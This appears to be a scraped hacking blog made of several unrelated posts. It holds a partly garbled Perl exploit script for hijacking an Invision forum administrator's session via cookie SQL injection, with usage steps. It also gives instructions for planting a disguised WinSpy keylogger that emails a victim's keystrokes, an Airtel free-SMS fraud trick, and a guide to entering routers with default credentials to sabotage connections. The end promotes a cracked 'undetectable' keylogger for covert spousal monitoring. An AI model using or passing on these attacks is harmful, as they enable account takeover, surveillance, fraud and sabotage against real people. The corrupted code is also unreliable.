This is what you like to call “Hacking a forum”.
I call it “Cracking into a forum” … Learn what hacking means you, lol…
PS: I am hacking a forum slowly, everything i am doing now, is posted here by steps :
First of all, what you need is a forum to hack. For the sake of this tutorial, and for the safety of a specific site, I will not release the URL of the site that I will be hacking in this. I will be refering to it as “hackingsite”.
So you’ve got your target. You know the forum to want to hack, but how? Let’s find the user we want to hack. Typically, you’d want to hack the admin. The administrator is usually the first member, therefore his/her User ID will be “1″. Find the User ID of the administrator, or person you wish to hack. For this tutorial, let’s say his/her ID is “2″.
Got it? Well, now we are almost all set. So far, we know the site we wish to hack, and the member we wish to hack. In this case, we are hacking the administrator of “hackingsite”, which is User ID “2″.
Now we need a nice exploit. I preferably, for 1.3.1 forums, use one that is in common circulation around these forums. For those who don’t have it, here:
CODE
#!/usr/bin/perl -w
##################################################################
# This one actually works Just paste the outputted cookie into
# your request header using livehttpheaders or something and you
# will probably be logged in as that user. No need to decrypt it!
# Exploit coded by “ReMuSOMeGa & Nova” and http://remusomega.com
##################################################################
use LWP::UserAgent;
$ua = new LWP::UserAgent;
$ua->agent(”Mosiac 1.0″ . $ua->agent);
if (!$ARGV[0]) {$ARGV[0] = ”;}
if (!$ARGV[3]) {$ARGV[3] = ”;}
my $path = $ARGV[0] . ‘/index.php?act=Login&CODE=autologin’;
my $user = $ARGV[1]; # userid to jack
my $iver = $ARGV[2]; # version 1 or 2
my $cpre = $ARGV[3]; # cookie prefix
my $dbug = $ARGV[4]; # debug?
if (!$ARGV[2])
{
print “..By ReMuSoMeGa & Nova. Usage: ipb.pl http://forums.site.org [id] [ver 1/2].\n\n”;
exit;
}
my @charset = (”0″,”1″,”2″,”3″,”4″,”5″,”6″,”7″,”8″,”9″,”a”,”b”,”c”,”d”,”e”,”f”);
my $outputs = ”;
for( $i=1; $i < j=”0;” current =” $charset[$j];” sql =” (” cookie =” (’Cookie’”> $cpre . “member_id=31337420; ” . $cpre . “pass_hash=” . $sql);
my $res = $ua->get($path, @cookie);
# If we get a valid sql request then this
# does not appear anywhere in the sources
$pattern = ”;
$_ = $res->content;
if ($dbug) { print };
if ( !(/$pattern/) )
{
$outputs .= $current;
print “$current\n”;
last;
}
}
if ( length($outputs) < member_id=” . $user . ” pass_hash=”">
What the fuck,Pretty confused, aren’t you? What the fuck are you supposed to do with this shit?! I’ll tell you. First of all, this is a Perl script.
How to Hack into forums
Installing a Keylogger on a Remote Machine
Note: This article is for educational purpose only and the author won’t be responsible for any kind of damage caused by following the information given in this article.
Now to install a Keylogger on a Remote Computer you have to follow the steps given below:
- First of all download Winspy keylogger software from link given below:
http://www.win-spy.com/
- After downloading this software, run the .exe. You will be asked to register yourself where you will be asked to enter a Userid and Password. Remember this password as it will be required in uninstalling the software.
- Now, another box will come, explaining you the hot keys(Ctrl + Shift + F12) to start the Winspy keylogger software.
- Now, on pressing hot keys, a login box will come asking userid and password. Enter them and click OK.
- Now, Winspy’s main screen will be displayed as shown in image below:
- Select Remote at top, then Remote install.
- On doing this, you will get a popup box as shown in image. Now, fill in the following information in this box.
User - type in the victim’s name
File name - Name the file to be sent. Use the name such that victim will love to accept it.
File icon - Keep it the same
Picture - select the picture you want to apply to the keylogger.
Email keylog to - Enter your Email address. Hotmail and Yahoo doesnot accept Keylog Files so enter other email address.
Thats it. This much is enough. If you want, can change other settings also. - After you have completed changing settings, click on “Create Remote file”. Now just add your picture to a winrar archive. Now, what you have to do is only send this keylog file to your victim. When victim will open this file, all keystrokes typed by victim will be sent to your email inbox. Thus, you will get all his passwords and thus will be able to hack his email accounts and even Myspace account password.
Airtel Hack 2009 for Unlimited Free SMS
- Navigate to Messages option on your mobile and click on Settings
- Click on Message Center Number and proceed to add a new message center number.
- In Message Center Name field, write anything. For an example, “crack to hack”.
- In the Message Center Number field, write +919810051905
- Choose Preferred Connection Type as Packet Data
- Save the message center and activate it from the options.
- Go to your phone menu and navigate to Settings >> Phone Settings >> Connection >> Packet Data
- In the settings of packet Data, edit the following options
- Packet Data Connection >> When available and Access Point >> Airtel Live
- Save all settings and you are done.
Windows 7 Cheat Sheet
From Desktop
- Windows Key + Tab : Aero [press Tab to cycle between Windows]
- Windows Key + E : Windows Explorer is launched.
- Windows Key + R : Run Command is launched.
- Windows Key + F : Search (which is there in previous Windows versions too)
- Windows Key + X : Mobility Center
- Windows Key + L : Lock Computer (It is there from the earlier versions as well)
- Windows Key + U : Launches Ease of Access
- Windows Key + P : Projector
- Windows Key + T : Cycle Super Taskbar Items
- Windows Key + S : OneNote Screen Clipping Tool [requires OneNote]
- Windows Key + M : Minimize All Windows
- Windows Key + D : Show/Hide Desktop
- Windows Key + Up : Maximize Current Window
- Windows Key + Down : Restore Down / Minimize Current Windows
- Windows Key + Left : Tile Current Window to the Left
- Windows Key + Right : Tile Current Windows to the Right
[Continue pressing the Left and Right keys to rotate the window as well] - Windows Key + # (# is any number) : Quickly Launch a new instance of the application in the Nth slot on the taskbar. Example Win+1 launches first pinned app, Win+2 launches second, etc.
- Windows Key + = : Launches the Magnifier
- Windows Key + Plus : Zoom in
- Windows Key + Minus : Zooms out
- Windows Key + Space : Peek at the desktop
From Windows Explorer
22. Alt + Up : Go up one level23. Alt + Left/ Right : Back/ Forward
24. Alt + P : Show/hide Preview Pane
Taskbar modifiers
25. Shift + Click on icon : Open a new instance26. Middle click on icon : Open a new instance
27. Ctrl + Shift + Click on icon : Open a new instance with Admin privileges
28. Shift + Right-click on icon : Show window menu (Restore / Minimize / Move / etc). Note: Normally you can just right-click on the window thumbnail to get this menu.
29. Shift + Right-click on grouped icon : Menu with Restore All / Minimize All / Close All, etc.
30. Ctrl + Click on grouped icon : Cycle between the windows (or tabs) in the group
Though some of them are there in previous versions of Windows, Windows 7 has incorporated many of them and have started many afresh.
Disguise as GoogleBot to view Hidden Content of a Website
It is Quite simple. You just need to change your browser’s User Agent. To change your Browser’s User Agent follow the steps given below:
- Copy the following code segment into a notepad file and save it as Useragent.reg or you may also download it.
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]
@=”Googlebot/2.1″
“Compatible”=”+http://www.googlebot.com/bot.html” - Now Double-Click on the file Useragent.reg to merge the registry file into your Windows Registry.
- Now Restart your computer. This is required to apply the changes made into the Registry.
- Voila! You’re done! Now you have become GoogleBot.
- For IE users : To restore the IE User Agent, Follow the Given Steps Below:
- Copy the following code segment into a notepad file and save it as Normalagent.reg or you may also download it:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]
@=”Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)” - Now Double-Click on the file Normalagent.reg to merge the registry file into your Windows Registry.
- Now Restart your computer. This is required to apply the changes made into the Registry.
- Copy the following code segment into a notepad file and save it as Normalagent.reg or you may also download it:
- For Opera Users : Opera allows on-the-fly for switching of User Agents through its “Browser Identification” function.
- For Firefox users : Just download User Agent Switcher extension for Firefox.
- Now Goto Tools -> User Agent Switcher -> Options -> Options.
- Click “User Agents”
- Click ” Add” and fill the following information in the form
- Description: Googlebot
- User Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
- App Name: Googlebot
- App Version: 5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
- Platform: +http://www.google.com/bot.html
- Vendor:
- Vendor Sub:
- Click “OK”.
- Now you may change the user agent on the fly.
Accessing the Router
Your tricks and tweaks based on your experiences teaches you many thing,like the one I’m going to mention now
Well the last Post by Manav, forces me to publish this article.
How to Access a router and what can you do after it ?
I’ve been doing this from past few months, and I when Manav said that it is a global problem, I feel to appreciate him for that.
Okei, so here we go,
There are actually two methods
- Manual (I love this)
- Remote (I still love this)
It is assumed that with the introduction of router, direct access to your computer, which was possible in the Dial UP reign, is now abolished, but in this world nothing is safe, so we’ll see.
Manual Method
The Router and the computer make a small local Area Network.
There are different IP addresses for different devices/nodes in the LAN, normally the range starts from 192.168.1.1, you can check out your node’s IP, by viewing the properties of the Network Connection (if its connected).
Now, normally the router or the server (if in a larger network ), has the local IP 192.18.1.1. You can always access the configuration page, by visiting the local IP 192.168.1.1 , type this IP address on any web browser.
This will lead you to the configuration page, where it will ask you for the user name and password, see the snapshot
Now, here lies the biggest flaw of the global aspect, try this useername : admin, password :: admin, try this it will workin 95% cases, why ?, because even the IT gurus are n00bs enough for never looking in this problem, Its a global situation, from Japan to Pakistan.
So here you are in the Configuration page , now even if the password is not admin, and you’ve physical access to the router, just reset it, all it need is a pin
In the Remote Method, all you need to know is the IP of the router, no local IP won’t get you to anybody’s router, so you need to know the IP when he is connected, there are so many methods, I’ll have a separate post for that.
Now the Question lies, what Can I do for fun ?
The most obvious thing that you can do is “trouble him/her”, how ?, well just navigate through the configuration pages, to find something like “Internet Connection “, It list the connections, see the snapshot
Now this is your work, out of the given list only one will be active, which one?, most probably the top one, edit it, change the VPI and VCI value, hola, you’re done, this trick will atleast trouble him for 2-3 days. And beside you can change many other things, that I leave on you !
In certain Router, it is even possible to get the username of the Internet Connection and the password of the connection in hidden form, but everybody knows that the password is there, and since you’ve access to the PHP page you can get the damn password out,for example see this snap
What else can I do ?, well I’ven’t tried it but lets see, the router and the computer interacts by using a port, which port ? , we don’t know, it can be any of those 65000 ports, so running a port scanner ( you’ll find many ) is an advisable thing, go ahead and let me know !
Perfect Keylogger undetectable. with key Gen
BlazingTools Perfect Keylogger with key Gen Perfect Keylogger is a remote covert surveillance tool made for everybody! With this key logger you can receive their keystrokes, IM chats, websites, screenshots and passwords by email. Covert remote surveillance - as easy as never before! Some applications of the keylogger: parental control; stealth monitoring of your spouse, internet friends etc. It is virtually undetectable
Download










